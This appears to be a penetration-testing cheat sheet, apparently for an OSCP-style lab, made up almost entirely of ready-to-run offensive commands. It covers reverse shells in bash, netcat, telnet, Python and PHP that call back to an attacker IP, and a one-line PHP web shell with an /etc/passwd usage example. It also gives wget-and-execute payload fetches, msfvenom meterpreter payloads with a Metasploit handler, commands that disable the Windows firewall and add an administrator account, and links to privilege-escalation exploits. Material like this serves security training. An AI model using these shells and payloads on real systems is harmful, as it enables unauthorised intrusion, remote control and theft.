Pentest-note

Contents

• Shell

  • Reverse Shell
  • Bind Shell
  • Web Shell
  • Kadimus

• File transfer

  • Ftp
  • Tftp
  • nc
  • SMB
  • curl
  • http
  • smbclient

• Scanner

  • nmap
  • nikto
  • enum4linux
  • LFISuite
  • gobuster

• Enable commands

  • Windows commands
  • Linux commands

• Compile exploits

  • Compile for Windows
  • Compile for Linux

• Generate payload

  • msfvenom
  • MSF Handler

• Common exploits

• Command snippets

Shell

Reverse Shell

Windows :

nc IP PORT -e cmd.exe

Listener:

nc -nlvp PORT

Linux :

bash -i >& /dev/tcp/10.11.0.0/31337 0>&1

nc -e /bin/sh 10.11.0.0 31337

Telnet reverse shell:

telnet 10.11.0.xxx 31337 | /bin/bash | telnet 10.11.0.xxx 31338

rm -f /tmp/p; mknod /tmp/p p && telnet 10.11.0.xxx 31337 0/tmp/p

Python reverse shell:

-c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.x.xxx",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Php reverse shell:

<?php echo shell_exec ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacking IP port >/tmp/f');?>

Usage:

<?php echo shell_exec ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.xx 80 >/tmp/f');?>

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php

Reverse php shell :

port 80 maybe a choice dor listening

https://github.com/fuzzdb-project/fuzzdb/blob/master/web-backdoors/wordpress/templates/php-reverse-shell.php

Deployment :

Set as txt to prevent IDS or run on server but not the target

<?system('wget http://10.11.0.xxx/php-reverse-shell.php.txt -O /tmp/2.php');?>

Kadimus

This tools is for exploit LFI

Shell:

./kadimus -t https://10.11.1.xx/section.php?page=php://input%00 -C \ '<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.xxx/4444 0>&1 2>&1"); ?>' -X input

More:

http://pentestmonkey.net/tools/web-shells/php-reverse-shell

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://gist.github.com/sckalath/67a59eb4955f1f9aedde

https://gist.github.com/sckalath/89590ef81557f3a87ef0

Bind Shell

nc IP PORT

nc -nlvp PORT  -e cmd.exe

python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i

for some case, sh is better than bash

Web Shell

One line php webshell (windows and linux ok) :

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

Usage:
http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

File transfer

Ftp

echo open 10.11.0.xxx 21> ftp.txt
echo USER offsec>> ftp.txt
echo ftp>> ftp.txt
echo bin >> ftp.txt
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt

Tftp

mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /usr/share/windows-binaries/nc.exe /tftp/
tftp -i 10.xx.0.x get nc.exe

nc

Sender nc -nlvp PORT  -w $(time to kill after file transfered) < text file
Receiver: nc ip port >file

SMB

Server: /usr/share/doc/python-impacket/examples# python smbserver.py PPP /root/Desktop/xxxxx/working/xxxx/MS17-010/

Receiver: copy \\10.11.0.xxx\PPP\1.exe C:\

curl

if put is enabled to the server

curl -v -X PUT -T 2.txt 10.11.1.xxx/2.txt

Another tools

cadaver http://10.11.1.xxx 
dav:/> put shell.asp shell.txt 
dav:/> copy shell.txt shell.asp;.txt

http

Hosting the server but this will prevent local execution of php code

python -m SimpleHTTPServer 80

Scanner

nmap

*****Nmap scripts are on /usr/share/nmap/scripts

Full scan:

nmap -p 1-65535 -T4 -A -v 10.11.1.xxx

Scan with all possible NSE script :

Nmap -v -p ?? --script all  

Port discovery :

nmap -sn 192.168.1.10/24   

Http methods checking :

nmap --script http-methods <target>

Scan with corresponding scripts

nmap -sV -sC 10.11.1.xxx

Scan udp port

nmap -sU -p <port> <ip>

ms-sql shell

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=poiuytrewq,ms-sql-xp-cmdshell.cmd="net user test test /add" 10.11.1.xxx

nikto

Commands:

nikto -h <ip>

https:

nikto -h <ip>:443 / 8080 / 8000

More usage : https://cirt.net/nikto2-docs/usage.html

enum4linux

Command :

enum4linux  <ip>

LFISuite

https://github.com/D35m0nd142/LFISuite

gobuster

Command :

gobuster -e -u http://192.168.0.155/ -w /usr/share/wordlists/dirb/big.txt

Enable commands

Windows commands

Enable RDP service :

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable RDP service :

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Rdp copy file transfer :

rdesktop ip -r disk:share=/home/xxx/yyy

Firewall stuffs:

Non XP:

To Turn Off:

netshAdvfirewall set allprofiles state off

To Turn On:

netshAdvfirewall set allprofiles state on

Status checking:

netshAdvfirewall show allprofiles

Windows XP firewwall:

Disable the Windows XP firewall:

netsh firewall set opmode disable

Enable the Windows XP firewall:

netsh firewall set opmode enable

Add new user on Windows:

net user test test /add
net localgroup "Administrators" test /add

Linux commands

Compile exploits

Compile for Windows

ubuntu:
64 bit
sudo apt-get update
sudo apt-get install mingw-w64

usage : i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32 for 32bit , remove -lws2_32 for 64bit

Compile for Linux

ubuntu:
sudo apt-get install libc6-dev-i386 


centos:
yum install glibc-devel 
yum install glibc-devel.i686
yum install glibc-devel.i686 libgcc.i686 libstdc++-devel.i686 ncurses-devel.i686
yum install glibc-static


usage:
gcc -m32 -o exp exp.c -static 
gcc -m64 -o exp exp.c -static 

Docker env :

https://hub.docker.com/_/centos/

Generate payload

msfvenom

msfvenom -p php/meterpreter_reverse_tcp LHOST=10.11.0.xxx LPORT=31337 -f raw > shell.php

MSF Handler

Command:

use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lhost 10.11.0.xxx
set lport 31337
set ExitOnSession True
exploit 

Common exploits

Mempodipper:

Linux Kernel 2.6.39 < 3.2.2
https://www.exploit-db.com/exploits/18411/

Powershell-suite

https://github.com/FuzzySecurity/PowerShell-Suite

MS08-067 smb bugs

https://gist.github.com/AfroThundr3007730/b433f420a792237440c836c06b4b32ab

UDEV < 1.4.1 - Local Privilege Escalation

https://www.exploit-db.com/exploits/8478/

usage : http://www.madirish.net/370

CSRSS Privilege Escalation (MS05-018) Windows XP SP1

https://www.exploit-db.com/exploits/1198/
https://www.cnblogs.com/xiaoxiaoleo/p/8452004.html

CVE 2010-3904

Kernel 2.6.30-36
https://github.com/lucyoa/kernel-exploits/tree/master/rds

MySQL 4.x/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2)

https://www.exploit-db.com/exploits/1518/
https://dillidba.blogspot.com/2016/01/get-root-shell-access-using-mysql-with.html

Command snippets

Cat on Windows:

C:\>type c.txt 

Search file on Windows:

dir /b/s *.txt

Bash for loop:

for i in {1..254}; do nmap -script smb-vuln-ms08-067.nse 10.11.1.$i;done

Check right of .exe on Windows:

icacls *.exe

SNMP:

udp service

Examples:

https://github.com/joenorton8014/offense/wiki/SNMP-on-Windows

netstat :

netstat -an

Check opened port on victim :

nc -nvv -w 1 -z <your IP> 1-100

Linux PE https://gist.github.com/sckalath/8b8fe29ee5489eaefda1

https://security.stackexchange.com/questions/151700/privilege-escalation-using-passwd-file

Enum cheat sheet

https://www.rebootuser.com/?p=1623

Windows PE

https://ibarramario94.gitbooks.io/oscp/content/oscp/windows-post.html

https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc